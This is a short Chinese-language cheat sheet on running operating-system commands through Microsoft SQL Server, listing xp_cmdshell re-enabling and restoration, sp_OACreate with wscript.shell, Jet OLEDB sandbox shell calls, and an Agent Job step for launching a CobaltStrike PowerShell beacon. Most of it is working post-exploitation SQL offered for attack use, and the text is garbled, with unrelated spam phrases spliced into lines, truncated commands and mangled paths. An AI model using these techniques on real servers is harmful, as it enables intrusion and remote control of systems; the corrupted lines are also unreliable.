MSSQL执⾏命令总结
⽅法⼀:xp_cmdshell
p_cmdshell "whoami"默认执⾏是关闭
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
将1修改为0则为关闭
xp_cmdshell 被删除可采⽤xplog70.dll恢复
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll'
魔兽世界公会名字⽅法⼆:SP_OACREATE
xp_cmdshell 删除以后,可以使⽤SP_OACreate。
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'Ole Automation Procedures', 1;
RECONFIGURE WITH OVERRIDE;
EXEC sp_configure 'show advanced options', 0;
李小璐薛之谦关系
执⾏[此⽅法⽆回显]
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\ /c whoami >d:\\temp\\1.txt'
陈意涵 坤达
⽅法三:通过沙盒执⾏命令酱香饼
开启沙盒
p_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
yooo利⽤jet.oledb执⾏命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=ias\ias.mdb','select shell("CMD命令")')
但是,当 c:\Windows\System32\ias\dnary.mdb 或 c:\Windows\System32\ias\ias.mdb 被删除时,命令就会⽆效了.
深圳木屋烧烤所以利⽤以下语句创建⼀个数据库:(数据库名l,后缀.xml是⾃定义,不影响使⽤.)
declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data l'
然后再利⽤jet.oledb调⽤l执⾏系统命令:
select * from openrowset('microsoft.jet.oledb.4.0',';l','select shell("CMD命令")')
⽅法四:通过Agent Job执⾏命令
修改开启Ageent Job,执⾏⽆回显CobaltStrike⽣成powershell上线
USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command =
实战当中需要对payload进⾏全编码防⽌编码错误导致失败参考链接: